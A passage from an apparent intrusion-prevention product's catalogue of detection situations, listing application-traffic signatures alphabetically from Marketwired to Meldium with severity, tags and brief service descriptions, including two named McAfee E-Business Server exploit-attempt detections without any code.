Description: Marketwired is a communications provider and partner of choice for public relations, marketing and investor relations professionals seeking premier news distribution and social communication solutions.
Back to top

Markit

About this situation: Markit usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-820-5242
Last changed: sgpkg-ips-1764-5242
Description: Markit usage detected. Markit On Demand is a real time web tracking and market information content network.
Back to top

Marklogic

About this situation: Application Marklogic detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MarkLogic focused on building a platform that enables enterprises to capture more data and do more with it. MarkLogic give customers an unmatched competitive edge through a powerful and trusted Enterprise NoSQL database platform that enables organizations to turn all data into valuable and actionable information.
Back to top

Markmonitor

About this situation: Markmonitor usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-676-5211
Last changed: sgpkg-ips-1764-5242
Description: Markmonitor usage detected. Markmonitor provides products for online brand and intellectual property protection.
Back to top

Maropost

About this situation: Application Maropost detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Maropost is a provider of on-demand digital and interactive marketing solutions, offers to use analytics, automation and segmentation.
Back to top

Marriott-Hotels

About this situation: Marriott Hotels usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Marriott manages and franchises a broad portfolio of hotels and related lodging facilities.
Back to top

Mashape

About this situation: Application Mashape detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mashape - marketplace for deliverying better APIs and Microservices.
Back to top

Mashery

About this situation: Application Mashery detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mashery delivers API management and software platforms for the connections that share information and intelligence.
Back to top

Masskom

About this situation: Application Masskom detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Masskom - Cloud based Enterprise Digital Signage and Sales Gamification Software
Back to top

Master-Control

About this situation: Application Master-Control detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MasterControl, Inc. provides GxP process and document management software solutions for life science companies. The company offers MasterControl suite that allows organizations to automate GxP and quality processes through a Web-based platform.
Back to top

MasteringPhysics

About this situation: Application MasteringPhysics detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pearson's MyLab and Mastering programs deliver consistent, measurable gains in student learning outcomes, retention, and subsequent course success.
Back to top

Masternaut

About this situation: Application Masternaut detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Masternaut provides a SaaS-based Mobile Resource Management
Back to top

materialise

About this situation: Application materialise detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Materialise provide Additive Manufacturing
Back to top

Materna

About this situation: Application Materna detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Materna is an IT consulting company that has been implementing IT projects for customers. It supports customers with process and technology consulting services, the development and implementation of the IT solutions and by providing services for maintenance, operations and training.
Back to top

MathXL-for-School

About this situation: Application MathXL-for-School detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: A powerful online homework, tutorial,
Back to top

Mavenlink

About this situation: Application Mavenlink detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mavenlink allows companies of all types and sizes to manage the entire lifecycle of project-based relationships including, project team management, messaging conversations, time expenses, invoicing online payments, file management, and financial reporting.
Back to top

Max.MD

About this situation: Application Max.MD detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MaxMD is secure web services company that maintains the internet
Back to top

Max:presence

About this situation: Application Max:presence detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Max
Back to top

MaxCDN

About this situation: Application MaxCDN detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MaxCDN is a content delivery network that helps companies accelerate static and dynamic content.
Back to top

MaxDB

About this situation: MaxDB traffic detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-512-5211
Last changed: sgpkg-ips-759-5211
Description: SAP MaxDB is an open source relational database management system (RDBMS) developed and supported by SAP AG.
Back to top

MaxEmail

About this situation: Application MaxEmail detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MaxEmail makes business communications easier by providing Internet enabled fax an voice mail services to its clients.
Back to top

MaxHire

About this situation: Application MaxHire detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MaxHire - recruiting software and applicant tracking system for executive recruiting firms and staffing agencies.
Back to top

Maximizer-CRM

About this situation: Application Maximizer-CRM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Maximizer CRM Live is a powerful and intuitive cloud CRM solution for organization.
Back to top

Maximus

About this situation: Application Maximus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MAXIMUS focus on more effective and efficient government programs, MAXIMUS has operated under our founding mission of
Back to top

Maxis-cloud

About this situation: Application Maxis-cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Maxis cloud - on-demand, real-time, fully managed cloud service
Back to top

MaxMind

About this situation: Application MaxMind detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MaxMind is a provider of IP intelligence and online fraud prevention tools.
Back to top

Maxnet-TV

About this situation: Maxnet TV usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based video-streaming/IP-TV service where users can watch videos and/or live TV using just a web browser.
Back to top

Maxpanda-CMMS

About this situation: Application Maxpanda-CMMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Maxpanda CMMS - responsive CMMS, Facilities Maintenance Software, Work Order Management Software, Preventative Maintenance Software and Maintenance Management Software.
Back to top

Maxxton

About this situation: Application Maxxton detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Maxxton provides IT solutions and services to the hospitality sector. Maxxton can help you to
Back to top

MaxxTraxx-Pro

About this situation: Application MaxxTraxx-Pro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MaxxTraxx is an All-Inclusive and Affordable software designed for use in Automotive, Heavy Truck, RV, Motorcycle, Bicycle, Marine, Restoration and Specialty repair shops.
Back to top

MaxxVault

About this situation: Application MaxxVault detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MaxxVault document management software, scanning software and document imaging specialists.
Back to top

Maytech

About this situation: Application Maytech detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Maytech provide a cloud platform for secure and reliable data transfer anywhere.
Back to top

McAfee

About this situation: McAfee services usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Basic Internet Services, Application Routing
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-1238-5242
Description: McAfee online services usage has been detected.
Back to top

McAfee Endpoint Security

About this situation: Endpoint Context Agent based McAfee Endpoint Security detection
Context: EI Correlation
Severity: 1
Tags: Security, Endpoint
First detected in: sgpkg-ips-991-5242
Last changed: sgpkg-ips-991-5242
Description: McAfee Endpoint Security endpoint application has been detected.
Back to top

McAfee Security Scan Plus

About this situation: Endpoint Context Agent based McAfee Security Scan Plus detection
Context: EI Correlation
Severity: 1
Tags: Security, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-991-5242
Description: McAfee Security Scan Plus endpoint application has been detected. McAfee Security Scan Plus is a tool for scanning a computer for up-to-date security solutions.
Back to top

McAfee Update Agent

About this situation: Endpoint Context Agent based McAfee Update Agent detection
Context: EI Correlation
Severity: 1
Tags: Software / System Updates, Endpoint
First detected in: sgpkg-ips-991-5242
Last changed: sgpkg-ips-991-5242
Description: McAfee Update Agent endpoint application has been detected. McAfee Update Agent is used to keep products developed by McAfee, such as Endpoint Security, updated.
Back to top

McAfee VirusScan Enterprise

About this situation: Endpoint Context Agent based McAfee VirusScan Enterprise
Context: EI Correlation
Severity: 1
Tags: Security, Endpoint
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-991-5242
Description: McAfee VirusScan Enterprise endpoint application has been detected.
Back to top

McAfee-ePO-Agent

About this situation: McAfee ePO Agent usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-1638-5242
Description: McAfee ePolicy Orchestrator (ePO) Agent is the distributed component of McAfee ePolicy Orchestrator. It downloads and enforces policies, and executes client-side tasks such as deployment and updating.
Back to top

McAfee-GTI-Service

About this situation: McAfee Global Threat Intelligence service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-1537-5242
Description: McAfee Global Threat Intelligence service usage has been detected.
Back to top

McAfee-Saas

About this situation: McAfee SaaS usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1010-5242
Description: McAfee SaaS delivers complete endpoint, email, web, and network protection through the cloud, saving your IT department time, effort, and costs.
Back to top

McAfee-SiteAdvisor

About this situation: McAfee SiteAdvisor usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-530-5211
Last changed: sgpkg-ips-1638-5242
Description: McAfee SiteAdvisor a web site rating service.
Back to top

McAfee-SmartFilter

About this situation: McAfee SmartFilter usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-628-5211
Description: McAfee SmartFilter a web site rating and categorizing service.
Back to top

McAfee-Update-Service

About this situation: McAfee update service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-530-5211
Last changed: sgpkg-ips-1638-5242
Description: This service is used to update various McAfee products.
Back to top

McAfee_CS-McAfee-e-Business-Server-Authentication-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability McAfee E-Business Server
Context: McAfee E-Business Server Administration Client Stream
Severity: 7
Tags: Windows, Any Hardware, McAfee e-Business Server, CVE2008, Windows not specific, Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-226-3038
Last changed: sgpkg-ips-226-3038
Vulnerability: McAfee-e-Business-Server-Authentication-Buffer-Overflow
Description:
Back to top

McAfee_CS-McAfee-e-Business-Server-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability McAfee E-Business-Server
Context: McAfee E-Business Server Administration Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, McAfee e-Business Server, CVE2008, Any Operating System not specific, Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-226-3038
Last changed: sgpkg-ips-226-3038
Vulnerability: McAfee-e-Business-Server-Authentication-Remote-Code-Execution
Description:
Back to top

McKesson

About this situation: Application McKesson detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: McKesson distributes medical supplies, information technology and care management products and services in the healthcare industry.
Back to top

MDL-autoMation

About this situation: Application MDL-autoMation detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MyDealerLot solutions provide automated customer recognition, advanced messaging, process control, and touch-less inventory management. MDL solutions coupled with your great staff will transform your Service and Sales operations and provide sustained ROI, improved CSI, and increased retention.
Back to top

mDNS

About this situation: Multicast DNS (mDNS) usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-475-5211
Last changed: sgpkg-ips-1153-5242
Description: mDNS is used for local name resolution.
Back to top

Me2day

About this situation: me2day usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: Me2Day is a social networking and micro-blogging web service
Back to top

Measuredprogress

About this situation: Application Measuredprogress detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Measured Progress have developed general and alternate assessments that have served 30 states, hundreds of districts, and thousands of schools nationwide. Measured Progress work with the Race to the Top consortia, as well as government agencies and foundations.
Back to top

Medallia

About this situation: Application Medallia detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Medallia provides SaaS-based customer experience management systems.
Back to top

Medatixx

About this situation: Application Medatixx detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The DOCexpert Computer GmbH and the MCS of doctor and ambulance systems GmbH have joined forces to medatixx GmbH
Back to top

MedBit

About this situation: MedBit usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Health, Application Routing
First detected in: sgpkg-ips-773-5211
Last changed: sgpkg-ips-1238-5242
Description: MedBit is a Finnish medical information technology service provider.
Back to top

Medecision

About this situation: Application Medecision detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Medecision is a provider of population health management technology and services for risk-bearing healthcare organizations across the care continuum.
Back to top

Media File Download

About this situation: Sites that enable download of media content.
Context: URL Application Context
Severity: 1
Tags: Entertainment, Network Bandwidth Loss, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that enable download of media content.
Back to top

Media-Hint

About this situation: Media Hint traffic
Context: Application Context
Severity: 1
Tags: Web Applications, Tunneling, Application Routing
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-773-5211
Description: Media Hint is a traffic redirection service designed to bypass geolocation based restrictions.
Back to top

Media-Innovation-Group

About this situation: Media Innovation Group usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Description: Media Innovation Group is an organization specializing in online digital advertising.
Back to top

Media.Net

About this situation: Application Media.Net detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Media.Net is a contextual advertising company that utilizes analysis and classification algorithms to dynamically identify and deliver ads on a web page.
Back to top

Mediacom

About this situation: Application Mediacom detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MediaCom offer specialist services in digital, ROI and direct response, consumer insights and research, business science, sponsorship, sports marketing.
Back to top

MediaFire

About this situation: MediaFire usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-628-5211
Description: MediaFire is a free cloud storage service for businesses, professionals, and individuals to store, backup, collaborate and share files with others.
Back to top

Mediafly

About this situation: Application Mediafly detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mediafly is a technology company and provider of the content mobility cloud. Mediafly SalesKit is the sales enablement solution for complex and dynamic organizations. Mediafly ProReview is the screening solution for television and movie studios.
Back to top

MediaFunnel

About this situation: Application MediaFunnel detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MediaFunnel is the easy to use, enterprise social media management platform that will allow you to involve more employees in promoting and protecting your brand.
Back to top

Mediagrif

About this situation: Application Mediagrif detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mediagrif's e-business solutions allow buyers and sellers within specific industries to source, purchase or sell products and to exchange information more efficiently using the Internet.
Back to top

MediaLoot

About this situation: Application MediaLoot detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Medialoot is a collection of premium design resources that help make your apps, themes, and other designs even more awesome in less time. Unlimited access to fonts, icons, PSDs, templates, patterns, and much more.
Back to top

Mediaocean

About this situation: Application Mediaocean detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mediaocean is the software platform provider for the marketing world. Its open traditional and digital media platforms empower businesses and professionals across the global marketing ecosystem with intelligent automation, efficiency, and flexibility in their workflow - from planning and buying, to analyzing and optimizing, to invoicing and payments.
Back to top

Mediaspectrum

About this situation: Application Mediaspectrum detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mediaspectrum is the technology for companies seeking to increase revenues, manage content, streamline processes and improve customer experience
Back to top

MediaTemple

About this situation: Application MediaTemple detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Media Temple is a website hosting and cloud hosting provider, which focuses on web designers, developers and creative agencies.
Back to top

MediaValet

About this situation: Application MediaValet detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MediaValet is completely cloud-based, enterprise class, global, digital asset management system.
Back to top

MediaWiki

About this situation: Application MediaWiki detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MediaWiki is software open source wiki package written in PHP, originally for use on Wikipedia.
Back to top

MediaWiki-Editing

About this situation: MediaWiki editing usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: This application provides users with open source software for managing a variety of wiki projects. Source: Wikipedia
Back to top

Medidata

About this situation: Application Medidata detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Medidata platform is designed to improve study design, protocol development, trial planning and management, site collaboration and management, patient-centric data capture and management, randomization and trial supply management, monitoring, safety event capture, clinical data capture
Back to top

Meditract

About this situation: Application Meditract detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MediTract's cost-effective and efficient healthcare contract management solutions for hospitals and healthcare systems Contract conformance, risk mitigation and compliance software and services designed for hospitals and healthcare systems of all types and sizes
Back to top

Medium

About this situation: Medium usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-1764-5242
Description: Medium is a content management system (CMS) that allows publishing and sharing blog posts.
Back to top

MedReps

About this situation: Application MedReps detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MedReps.com help recruiters connect with medical sales professionals. Those first users - both job seekers and recruiters - found unprecedented success on MedReps, and word travelled fast.
Back to top

Medrisk

About this situation: Application Medrisk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Medical Risk Management is dedicated to providing healthcare professionals with convenient access to continuing education. Online-based continuing education provides
Back to top

Meetin.gs

About this situation: Application Meetin.gs detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Meetin.gs is a web and mobile meeting organizer for making the exchange around online and face-to-face meetings more effective and productive.
Back to top

MEETin.org

About this situation: Application MEETin.org detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MEETin.org is a social organization, a word-of-mouth effort to bring people together from all over for fun, low-key events.
Back to top

Meeting-Maker

About this situation: Meeting Maker usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: A cross-platform personal calendar and group scheduling application; source Wikipedia
Back to top

MeetingKing

About this situation: Application MeetingKing detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MeetingKing is a web-based meeting management tool for on-line and face-to-face meetings that helps you to have more productive and effective meetings.
Back to top

MeetMe

About this situation: MeetMe usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-629-5211
Description: A web-based social networking service which allows users to connect and share information with each other online.
Back to top

Meetup.com

About this situation: Meetup.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based social networking service which allows users to connect and share information with each other online.
Back to top

Meevee

About this situation: MeeVee usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: It allows users to make or choose customise T-Shirts.
Back to top

Mega

About this situation: Mega usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: Mega is a storage service that allows the encrypted storage and transfer of files to other members.
Back to top

Megabox

About this situation: Megabox usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Korean video streaming website.
Back to top

MegaChat

About this situation: MegaChat usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-676-5211
Last changed: sgpkg-ips-676-5211
Description: MegaChat is a browser-based chat application that can be used for video calls and file sharing.
Back to top

Megacloud

About this situation: MEGACLOUD usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: is the only free cloud storage service that gives you both an 8GB dedicated file storage and 8GB backup service for free.
Back to top

Megafile-Upload

About this situation: Application Megafile-Upload detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Megafile Upload - File Hosting Service
Back to top

Megapath

About this situation: Application Megapath detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MegaPath is a cloud communications and connectivity company that delivers voice, unified communications, internet access, secure networks and hosted IT services to businesses nationwide.
Back to top

Megaproxy

About this situation: Megaproxy usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-471-5211
Last changed: sgpkg-ips-636-5211
Description: Megaproxy provides proxy service via the HTTPS protocol. The service is used to bypass Internet filtering. The application is available at https://www.megaproxy.com.
Back to top

Megashare

About this situation: Megashare usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: Megashare allows you to store and share photos, videos, music, documents and web links.
Back to top

Megashares

About this situation: Megashares usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: MegaShares allows you to upload folders, resume uploads and download from FTP for backup.
Back to top

MegaSSH

About this situation: MegaSSH usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies
First detected in: sgpkg-ips-1069-5242
Last changed: sgpkg-ips-1069-5242
Description: MegaSSH is a tool used to bypass firewalls by connecting to an SSH/Proxy. The purpose of using the application is to get free internet access.
Back to top

Megaupload

About this situation: Megaupload usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-408-4219
Last changed: sgpkg-ips-595-5211
Description: Megaupload is an online file sharing site, that allows users to upload files and share them to other users.
Back to top

Megaupload-Download

About this situation: Megaupload file download detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-408-4219
Last changed: sgpkg-ips-595-5211
Description: Megaupload is an online file sharing site, that allows users to upload files and share them to other users.
Back to top

Megaupload-Upload

About this situation: Megaupload file upload detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-408-4219
Last changed: sgpkg-ips-595-5211
Description: Megaupload is an online file sharing site, that allows users to upload files and share them to other users.
Back to top

Megaventory-Sales-Management

About this situation: Application Megaventory-Sales-Management detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Megaventory Sales Management - web-based software for online inventory management, order fulfillment and manufacturing using bills of materials.
Back to top

MegaVideo

About this situation: MegaVideo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-636-5211
Description: MegaVideo is a video hosting service by Megaupload.
Back to top

Meisterplan

About this situation: Application Meisterplan detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Meisterplan is an interactive project management software that brings resource management, budget, strategy, productivity and overall efficiency to your project management.
Back to top

Mekusharim

About this situation: mekusharim usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a social networking service in Israeli that allows users to share photos, messages, and videos.
Back to top

Melbourne-IT

About this situation: Application Melbourne-IT detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Melbourne IT is domain name registration in most of the major national and global top-level domains. It also offers web and email hosting services and online marketing services.
Back to top

Meldium

About this situation: Meldium usage detected
